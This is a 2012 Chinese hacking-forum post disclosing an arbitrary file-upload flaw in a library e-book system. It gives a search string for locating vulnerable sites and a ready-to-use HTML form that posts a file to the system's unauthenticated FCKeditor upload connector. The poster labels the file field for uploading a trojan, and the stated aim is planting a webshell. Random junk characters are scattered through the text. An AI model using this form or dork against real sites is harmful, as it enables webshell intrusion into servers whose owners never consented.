找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 7583|回复: 0
打印 上一主题 下一主题

点点书库图书馆系统文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:20:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
主题:图书馆系统任意文件上传漏洞
& `, Z, i& U4 c$ G 作者:冰锋刺客0 q, M4 _* j5 U0 c7 q
厂商:点击书(dianjishu.com)' O+ V. X. L; G7 z+ Y% r. F
日期:2012-6-216 v, C/ U% k, w* g  u  ^$ a$ c4 {+ B

3 U5 Q( F1 ~! [6 d8 OI 概述
9 t+ y) V  [# p, t& _   点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell$ q- }3 e- M( s& E
II 简介
+ k: k  Y. Z% ^   关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"7 s: p4 C6 b7 E8 c
补充一个漏洞$ A+ r+ A  h" r' u" q4 g
<form id="frmUpload" enctype="multipart/form-data"3 V3 b& O/ g# S1 S2 N: |& S
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>1 @/ K) `5 I* H, A! W- N
<input id="btnUpload" type="submit" value="操翻他">: g& t% g2 o% b: p2 a  o7 |# U# ]
</form>- |/ @9 s( c# V# B
你们懂的
0 o/ c/ t: q, ~- _/ A1 [0 g 那傻逼提供还需要改包." o) S& X/ n4 `- F, G! \
自己看了下源代码发现fckeditor, I2 L' c* ^: u# j
直接秒杀
) V/ ?& M# E, B8 \9 O
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表